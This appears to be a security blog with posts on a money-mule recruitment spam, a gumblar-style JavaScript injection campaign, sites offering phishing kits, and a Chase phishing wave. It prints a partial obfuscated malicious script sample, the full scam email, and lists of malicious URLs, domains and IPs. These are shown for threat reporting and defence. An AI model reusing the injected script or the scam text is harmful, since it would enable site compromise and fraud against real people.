Stuff

Mules for Japan

2010-07-05T03:14:00.000-07:00

What just landed in my inbox:

Subject: [!! SPAM] BE OUR REPRISENTATIVE (sic)

Body:
---snip---
HI,

I represent TEIKOKU OIL AND GAS COMPANY based in TOKYO,japan our company deals on oil and gas which we sell,import and also exports.We are searching for trust worthy administrative officer who can help us establish a medium of getting to our customers in Europe and America as well as making payments through you as our administrative officer.The international money transfer tax for legal entities (companies) in japan is 25%, whereas for the individual it is only 7%.There is no sense for us to work this way, while tax for international money transfer made by a private individual is 7% .

We are willing to pay you and the lawyer 15% for every payment received by you from our clients who makes payment through you.

Teikoku _Oil_ gas _company
1- 31-10, Hatagaya, Shibuya-ku
151-8565, Tokyo
JAPAN
email:teikoku*******@hotmail.com
Phone: +81-3-3466-123
Fax: +81-3-3468-351
Note that, as our administrative officer, you and your lawyer will receive 10% of whatever amount you receive for the company and the balance will be paid to our company. Please, to facilitate the conclusion of this transaction if accepted, do send me the following:

(1)Your full names.
(2)Contact address.
(3)Age/Sex.
(4)Mailing address.
(5)State and Country.
(6)Telephone number and fax number.

to our email ; teikoku******@hotmail.com

Thank you for your time.
your Respectfully,
Mr kiko higashida
REGIONAL MANAGER
---snap---

Obviously this mail has nothing to do with the real TEIKOKU OIL CO. LTD but is an attempt to recruit some unsuspecting user(s) for fraudulent activity - relay money or goods to a cybercriminal, mainly Phishers or Malware spreaders.

Interestingly a quick google search revealed that a similar scheme abusing this companies name was already used back in 2007.

From mail headers we could see that the cybercriminal(s) registered an account at a Japanese provider for sending emails. The mail which we received was sent by somebody in Italy - the same IP address was used once at 28/04/2010 to login to 'YouTribe.net' with the nick 'ninetto'.

Don't be fooled by such offers, they are known to end sad.

Injected URLs of JS malware

2009-10-19T03:39:00.001-07:00

While checking a list of compromised websites which were injected with 'gumblar.a' code in the past, I discovered that about 50% of them now contained additional danger in form of malicious URLs.
Following CLSIDs were found in the deobfuscated code:

{BD96C556-65A3-11D0-983A-00C04FC29E30}
{BD96C556-65A3-11D0-983A-00C04FC29E36}
{AB9BCEDD-EC7E-47E1-9322-D4A210617116}
{0006F033-0000-0000-C000-000000000046}
{0006F03A-0000-0000-C000-000000000046}
{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}
{6414512B-B978-451D-A0D8-FCFDF33E833C}
{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}
{06723E09-F4C2-43c8-8358-09FCD1DB0766}
{639F725F-1B2D-4831-A9FD-874847682010}
{BA018599-1DB3-44f9-83B4-461454C84BF8}
{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}
{E8CCCDDF-CA28-496b-B050-6C07C962476B}

Seems not a very new set of attacks but the form in which they try to accomplish it is quite interesting because currently (16 Oct 09)almost no AV vendor participating at VirusTotal seems to detect the malicious scripts even by heuristics. As a matter of fact the pushed code is created "on the fly" and different at each get. Some of the malicious URLs (last update Wed Oct 21 03:08:37 UTC):

hxxp://rapidsharecrawler.com/utils/images/tmp/bg3.php
hxxp://publicnet.ca/Templates/faq.php
hxxp://1st-broker.ru/thehun/
hxxp://achtbanen.org/images/b-one-default.php
hxxp://gemus.pl/db/ftpchk3.php
hxxp://mashaei.ir/AWStats/admin.php
hxxp://ajkcas.com/_vti_cnf/ad.php
hxxp://myrussia.kz/includes/regions.php
hxxp://npnonline.in/includes/indexnew.php
hxxp://sm-komplekt.ru/images/montag_in.php
hxxp://orkutmasti.com/tempimage/viewsongs.php
hxxp://bzb.de/user_img/test.php
hxxp://elpotrero.com.ar/seleccion/Maradona-Marsella.php
hxxp://kingofbelgrade.com/eng/pngfix.php
hxxp://agag44.com/vb/ardn.php
hxxp://epiphyte.ru/home/db1900b.mysql.php
hxxp://ebib.info/cache/globals.php
hxxp://betabalon.com.tr/catering/videos.php
hxxp://doctor-jade.ru/image/collor1.php
hxxp://infobyte.com.tr/yyy/steffrect.php
hxxp://firelogltd.co.uk/_vti_bin/index.php
hxxp://hamnkrog.se/xmlrpc/LICENSE.php
hxxp://lmdl.gamesquality.com/web_files/soporte.php
hxxp://tne.tourskorea.com/newEvent/Timages/left_event.php
hxxp://rawalrohi.com/images/ART.php
hxxp://internetravel.ru/downloads/wp-feed.php
hxxp://tacticz.be/maarten/news.php
hxxp://borsalita.ru/g/index.php
hxxp://driving-177.ru/img/pricelist_clip_image002_0001.php

By now I have collected 91 of such 'new gumblar'-sites.
Visiting any of these does push code of average 30KB while subsequent attempts will only push about 3 KB. In most cases these URLs were just written after the closing head tag and if you find these in any files of your web site, it's time to change passwords, clean up, etc.
These pages try to download PDF, SWF and EXE files to the victim machine.

Sample code:

//< script >
jBbld=24;if(alert)jBbld='';s8a=unescape('%'+jBbld);
xIUH='B64<6fcW75mW65<6et.wW72iteB28B22B3cB64iv <73tyle<3dL5cL22posiL74ionL3aabsol<75teL3b<20left<3aW2d1<3000pw78w3b tB6fp<3aL2d1L3000px<3bB5c<22<3e<22)W3bfunct<69on b6(t)B7bvW61B72 c1L2cc2,c3,B651B2ce<32,e3,B654B2cjL3d0,d<3d<22<22,k<3dB22JW6fZp+B45A6rW68vL43sW58B56DL4dc<65<77O45btS9ilL4cL57kqL55L38W66mR7xgL2fj0W4bTB51<42N<64yL75L32L3dazG3HnY<49PW46L31B22W3bL64oB7be<31W3dW6b.<69nde<78W4ff(tW2echaB72At(+SW74riW6eg.fB72oL6dCharCode(W63<33)<3bB7dwhile<28jW3ct.L6cL65ngtW68)<3bL72W65tB75B72nB20dW3bW7ddoW63umentB2ewL72L69te<28W22L3cscriL70t languL61<67eL3dB56L42ScriptB3eSub s1(e,fW6e,dt)L3aW4fn<20ErB72orL20W52esB75me Ne<78tL3as1L3d0B3aW22L2bB27SW65<74 <6bW3d<65.CrW65a<74eTextFile(fnL2cT<52UE)<3aif <45rr<3e0 <63B3bvar<20r,a,b,d,f,g,hL3brL3dnuW6cl<3baW3dW22tryL7brB3doW2eW22<3bW62B3dW22L43<72W65ateW4fbjeW63t(W6e<22B3bdL3d<22)L7dcW61tch(<65)L7b<22B3bB66W3dL22GetL4fbj<65ct(<22B3bg<3d<27,B22W22B27B3bhW3dd+aW3bevaB6c(W61+b+h+<62+g+B68+b+g+g+h+fB2bL27<22B22,W6eL27+h+f+L27nL27+g+h+f+B27n<27+d+L27W7d<7dL7dB7dB7dW7dB27)W3bB72eB74urnL20rW7dfuB6ecL74W69W6fn<20f4(d,c)<7btryB7bW64B5bdB2elengthW5dL3dcB3bB7dL63atcL68B28e)<7bB7d<7dL66uB6ectioL6e f2(<6f,tL2cnL2cd)L7bfW6fr(var iL3dnB2eleL6eg<74hW2d1W3bi<3e<3d0B3bi<2dB2d)L7bif<28W6f<29tryB7bo.TypeL3d2B3bo.<4doW64W65<3d3<3bo.B4fpenW28)W3bo.<43hars<65t<3dW27W49SOB2d8859<2d1B27<3bW6f.W57riteTexL74(L64)W3bB6f.SaW76<65TL6fF<69leB28nW5b<69W5d,B32)L3bB6fW2eClose()<3bre<74urnB20nW5biB5dL3bL7dcatch(e)<7bW7d<69W66(W74B26L26wiB6edowL2eL73B31<26W26s1(tB2cnL5bL69<5d,B64L29)reL74urW6eB20nB5bB69L5d<3bL7dretu<72nW200B3b<7dfunW63tion f3(<29<7btry<7bvar ......

< /script >

Update Mon Oct 31 21:05 JST 2009:
Total discovered injected sites hosted in Japan: 550+
Out of these 400+ are currently still injected.
Time to send out some more mails.
Biggest injected spot is/was a Persian Blog site.

Other stats:
Total hits - 443748
Biggest spreader in JP was a famous 'jinja' (shrine) site with at least 11037 hits.

Phishing for Dummies

2009-10-11T00:21:00.000-07:00

There was a phishing mail in my inbox today which caught my interest and resulted in some hours of research. The result was discovery of a bunch of web sites distributing 'Phish Kits' for free - ready to use packages. Some screen captures of my findings:

The first one

... Then searching some more

... and more

... and more

... even more

... and finally

Most of these sites also point to additional pages containing malicious tools for mass mailing, doing certain kind of scanning for vulnerable hosts, ddos attacks and other nasty things.
Close observation of these sites reveals similarities and that is no wonder because they are all created by the same criminal(s). The provided phish kits do contain PHP scripts which will send the harvested data to the creator in addition to the malicious user who tries to use them.
This scheme is used since more than a year and in the past several similar sites have appeared and were taken down eventually:

scam-pags.net
scam4u.com
thebadboys.org
freescam.webobo.com
online-scams.net
scam7.com
www .scam-page.fr
www .mafia8doc.com
scams-mafia.com
worldpowerz.com
sakhsookh.100webspace.net

Some more technical details might make it into this post soon.

Phishing Attack on Chase (DEC 2008)

2008-12-26T22:18:00.000-08:00

Good day!

Most of the christian world is celebrating Christmas and also elsewhere, people are enjoying a short vacation before jumping into the Year 2009. As always at such seasons - it is also an opportunity for criminals who take advantage of the fact that CERTs, abuse desks, ISPs and many IT security related companies might be 'a bit' slow in response.

Beginning at 2008-12-25 18:46:07 a huge spam wave of phishing URLs targeting "JPMorgan Chase & Co" was observed. At time of writing we have collected no less than 11209 unique URLs like the following:

hxxp://chaseonline.chase.com.dlls-to.com/Secure/webform/OSL.aspx?LOB=

The domains used for this attack are:

dll-isapi.com
dlls-to.bz
dlls-to.com
dlls-to.mn
dlls-to.name
file-07i.com
file-id011.com
file-id017.com
file-p0174.eu
filestack-01.bz
filestack-01.com
filestack-01.co.in
filestack-01.name
filestack-01.net
filestack-01.org
idr-to7.cc
idr-to7.com
idr-to7.mobi
idr-to7.net
idr-to7.us
mode-d021.com
modedl-id01.com
userdl-isapi000071.com
userdl-isapi000071.org
userdl-isapi000073.org
userdl-isapi000075.org

These domains are resolving to 15 IPs at a time, three of them are changing each 30 minutes. Total IP pool consists of the following 265 addresses :

IP Address - Country

113.131.224.36 Korea, Republic Of 114.145.62.47 Japan 114.164.132.216 Japan
114.182.11.127 Japan
114.182.58.206 Japan
114.201.27.115 Korea, Republic Of
114.74.219.117 Australia
118.15.181.227 Japan
118.19.70.69 Japan
118.8.122.197 Japan
12.202.1.12 USA - New York
12.202.7.201 USA - New York
121.113.181.142 Japan
121.113.182.244 Japan
172.131.180.173 USA - Virginia
172.162.2.190 USA - Virginia
172.162.31.108 USA - Virginia
173.21.75.7 USA - New York
193.39.73.14 Romania
201.233.114.143 Colombia
203.128.184.164 Korea, Republic Of
203.128.184.36 Korea, Republic Of
209.127.20.20 USA - California
210.249.74.115 Japan
211.128.182.235 Japan
211.128.182.40 Japan
212.129.111.29 Russian Federation
212.152.45.193 Russian Federation
216.20.143.167 USA - West Virginia
218.238.4.111 Korea, Republic Of
218.44.41.132 Japan
219.110.78.126 Japan
219.126.121.249 Japan
219.126.123.144 Japan
220.109.1.62 Japan
220.109.147.167 Japan
220.148.160.212 Japan
220.148.162.250 Japan
220.148.163.182 Japan
220.221.18.140 Japan
222.150.156.30 Japan
24.136.176.91 USA - Georgia
24.136.214.30 USA - Georgia
24.148.132.49 USA - Georgia
24.197.136.101 USA - Missouri
24.197.136.96 USA - Missouri
24.31.140.216 USA - Virginia
24.34.244.95 USA - New Jersey
58.176.9.74 Hong Kong
58.190.43.53 Japan
58.89.120.228 Japan
59.28.212.203 Korea, Republic Of
60.43.10.44 Japan
62.143.26.211 Germany
62.31.243.71 United Kingdom
62.42.80.67 Spain
62.57.222.4 Spain
65.39.139.81 USA - New York
65.81.151.81 USA - Georgia
66.168.183.107 USA - Missouri
66.30.132.23 USA - New Jersey
67.135.130.48 USA - Colorado
67.172.60.164 USA - New Jersey
68.122.80.105 USA - California
68.179.138.95 USA - Indiana
68.255.5.42 USA - Illinois
68.40.193.72 USA - New Jersey
68.51.164.175 USA - New Jersey
68.60.29.213 USA - New Jersey
68.72.113.78 USA - Texas
68.72.114.224 USA - Texas
68.72.128.182 USA - Texas
68.72.131.62 USA - Texas
68.72.134.5 USA - Texas
68.72.142.212 USA - Texas
68.72.143.122 USA - Texas
69.14.236.16 USA - Illinois
69.148.198.52 USA - Texas
69.149.57.104 USA - Texas
69.149.59.247 USA - Texas
69.150.75.115 USA - Texas
69.152.229.233 USA - Texas
69.154.246.1 USA - Texas
69.155.130.228 USA - Texas
69.155.143.252 USA - Texas
69.84.99.133 USA - Florida
70.121.191.48 USA - Virginia
70.129.133.198 USA - Texas
70.133.4.18 USA - Texas
70.141.208.193 USA - Texas
70.235.120.122 USA - Texas
70.242.184.253 USA - Texas
70.242.185.195 USA - Texas
70.244.113.250 USA - Texas
70.248.179.225 USA - Texas
70.254.87.142 USA - Texas
71.113.148.4 USA - Virginia
71.113.158.101 USA - Virginia
71.113.195.107 USA - Virginia
71.113.203.160 USA - Virginia
71.137.224.162 USA - California
71.143.155.183 USA - Texas
71.205.98.16 USA - New Jersey
71.227.122.14 USA - New Jersey
71.230.155.12 USA - New Jersey
71.234.16.79 USA - New Jersey
71.62.75.72 USA - New Jersey
72.229.123.166 USA - Virginia
72.253.196.243 USA - Hawaii
74.65.132.241 USA - Virginia
75.19.121.53 USA - Texas
75.19.37.186 USA - Texas
75.250.122.98 USA - New Jersey
75.32.104.233 USA - Texas
75.32.185.47 USA - Texas
75.32.187.159 USA - Texas
75.32.187.225 USA - Texas
75.34.153.143 USA - Texas
75.45.176.164 USA - Texas
75.49.81.174 USA - Texas
75.58.247.185 USA - Texas
75.62.113.92 USA - Texas
75.63.170.53 USA - Texas
75.69.200.16 USA - New Jersey
75.74.26.103 USA - New Jersey
76.11.157.39 USA - Missouri
76.112.122.216 USA - New Jersey
76.119.221.197 USA - New Jersey
76.202.231.201 USA - Texas
76.203.25.6 USA - Texas
76.205.66.56 USA - Texas
76.205.88.196 USA - Texas
76.211.16.24 USA - Texas
76.226.133.78 USA - Texas
76.226.144.124 USA - Texas
76.226.171.21 USA - Texas
76.226.171.237 USA - Texas
76.226.188.247 USA - Texas
76.226.66.184 USA - Texas
76.226.82.168 USA - Texas
76.226.90.125 USA - Texas
76.232.224.223 USA - Texas
76.234.133.223 USA - Texas
76.234.138.225 USA - Texas
76.251.81.85 USA - Texas
76.251.83.139 USA - Texas
76.251.83.157 USA - Texas
76.251.83.217 USA - Texas
76.252.185.129 USA - Texas
76.252.189.68 USA - Texas
76.27.148.240 USA - New Jersey
77.100.42.202 United Kingdom
77.126.235.37 Israel
77.184.94.178 Germany
77.41.109.184 Russian Federation
78.42.185.106 Germany
78.42.187.15 Germany
78.53.112.224 Germany
78.53.115.107 Germany
78.53.115.246 Germany
78.96.169.60 Romania
79.117.198.30 Romania
79.117.204.71 Romania
79.117.86.21 Romania
79.118.233.104 Romania
79.118.233.133 Romania
79.118.233.184 Romania
79.118.233.60 Romania
79.118.234.13 Romania
79.118.234.32 Romania
79.142.170.18 Russian Federation
79.164.61.132 Russian Federation
79.165.223.91 Russian Federation
80.2.63.234 United Kingdom
81.101.230.224 United Kingdom
81.110.166.60 United Kingdom
81.141.211.13 United Kingdom
81.203.80.40 Spain
81.203.89.45 Spain
81.96.34.100 United Kingdom
82.10.227.196 United Kingdom
82.11.47.220 United Kingdom
82.13.107.180 United Kingdom
82.13.84.146 United Kingdom
82.17.75.240 United Kingdom
82.18.60.242 United Kingdom
82.20.249.167 United Kingdom
82.200.227.62 Kazakhstan
82.21.223.160 United Kingdom
82.21.226.51 United Kingdom
82.3.206.34 United Kingdom
82.33.53.67 United Kingdom
82.38.35.93 United Kingdom
82.39.65.27 United Kingdom
82.40.118.13 United Kingdom
82.40.149.96 United Kingdom
82.40.240.90 United Kingdom
82.44.225.124 United Kingdom
82.44.37.132 United Kingdom
83.23.123.137 Poland
83.254.19.246 Sweden
84.121.118.24 Spain
84.126.24.81 Spain
84.126.31.131 Spain
84.56.103.15 Germany
84.56.119.24 Germany
84.56.80.19 Germany
85.216.125.210 Germany
85.216.125.43 Germany
86.0.209.6 United Kingdom
86.122.146.169 Romania
86.15.140.68 United Kingdom
86.15.143.160 United Kingdom
86.175.176.93 United Kingdom
86.5.237.166 United Kingdom
86.9.137.35 United Kingdom
87.179.204.12 Germany
87.179.226.80 Germany
87.224.233.52 Russian Federation
87.69.167.156 Israel
87.70.245.150 Israel
88.18.129.105 Spain
89.102.187.44 Czech Republic
89.103.102.100 Czech Republic
89.137.210.212 Romania
89.138.52.188 Israel
89.208.65.230 Russian Federation
89.223.26.229 Russian Federation
89.247.98.176 Germany
89.41.182.181 Romania
91.108.67.46 United Kingdom
91.123.159.112 Ukraine
91.89.164.106 Germany
91.89.200.120 Germany
91.89.200.255 Germany
92.101.10.72 Russian Federation
92.11.226.17 United Kingdom
92.114.74.6 Romania
92.192.100.173 Germany
92.233.26.189 United Kingdom
92.235.49.58 United Kingdom
92.252.242.145 Russian Federation
92.61.238.186 Israel
93.188.86.159 Russian Federation
93.80.109.149 Russian Federation
93.80.168.176 Russian Federation
93.80.170.189 Russian Federation
93.80.99.222 Russian Federation
94.52.26.211 Romania
95.24.154.126 Russian Federation
95.24.201.91 Russian Federation
95.24.240.124 Russian Federation
95.24.32.170 Russian Federation
97.82.50.128 USA - Missouri
98.141.74.204 USA - Virginia
98.174.198.85 USA - Georgia
98.217.125.105 USA - New Jersey
98.218.21.87 USA - New Jersey
98.222.245.254 USA - New Jersey
99.131.50.175 USA - Texas
99.140.243.14 USA - Texas
99.141.1.149 USA - Texas
99.145.85.134 USA - Texas
99.151.125.173 USA - Texas
99.228.208.25 Canada

If any of those IPs is yours, you might want to check your machine for problems.

__________________________________

A quick timetable of abused IPs (Japan):

114.145.62.47
Tue Dec 30 10:36:19 - Tue Dec 30 14:37:17

114.164.132.216
Sat Dec 27 04:21:15 - Sat Dec 27 05:21:22
Sat Dec 27 05:51:24 - Sat Dec 27 06:21:26
Sat Dec 27 12:32:36 - Sat Dec 27 13:33:06

114.182.11.127
Sun Dec 28 13:46:28 - Sun Dec 28 20:57:32

114.182.58.206
Fri Dec 26 18:49:16 - Fri Dec 26 19:19:19
Fri Dec 26 20:19:30 - Fri Dec 26 21:49:53

118.15.181.227
Fri Dec 26 14:04:48 - Fri Dec 26 14:48:22

118.19.70.69
Sat Dec 27 18:53:39 - Sun Dec 28 00:24:18

118.8.122.197
Sun Dec 28 06:35:05 - Sun Dec 28 07:05:13
Sun Dec 28 08:05:22 - Sun Dec 28 14:46:38

121.113.181.142
Tue Dec 30 19:08:06 - Tue Dec 30 20:08:21
Tue Dec 30 20:38:30 - Tue Dec 30 22:08:43

121.113.182.244
Tue Dec 30 09:36:03 - Tue Dec 30 16:37:36

210.249.74.115
Sun Dec 28 14:46:38 - Sun Dec 28 21:27:39

211.128.182.235
Fri Dec 26 14:18:15 - Fri Dec 26 16:18:43

211.128.182.40
Fri Dec 26 16:48:46 - Fri Dec 26 18:19:09

218.44.41.132
Sat Dec 27 12:02:33 - Sat Dec 27 12:32:36

219.110.78.126
Sun Dec 28 09:35:38 - Sun Dec 28 12:16:16

219.126.121.249
Mon Dec 29 14:31:57 - Mon Dec 29 17:32:39

219.126.123.144
Tue Dec 30 20:08:21 - Tue Dec 30 20:38:30

220.109.1.62
Sun Dec 28 12:16:16 - Sun Dec 28 12:46:18

220.109.147.167
Sun Dec 28 19:57:18 - Sun Dec 28 21:27:39

220.148.160.212
Tue Dec 30 20:38:30 - Wed Dec 31 02:10:00

220.148.162.250
Tue Dec 30 17:07:38 - Tue Dec 30 18:38:03

220.148.163.182
Sun Dec 28 02:54:40 - Sun Dec 28 03:24:42

220.221.18.140
Mon Dec 29 18:02:42 - Tue Dec 30 00:33:55

222.150.156.30
Fri Dec 26 19:19:19 - Fri Dec 26 19:49:22

58.190.43.53
Sat Dec 27 09:32:00 - Sat Dec 27 10:02:07

58.89.120.228
Fri Dec 26 19:49:22 - Fri Dec 26 20:19:30

60.43.10.44
Mon Dec 29 19:02:49 - Mon Dec 29 20:03:00

Above list clearly shows that some IPs were used just once, some for only 30 minutes.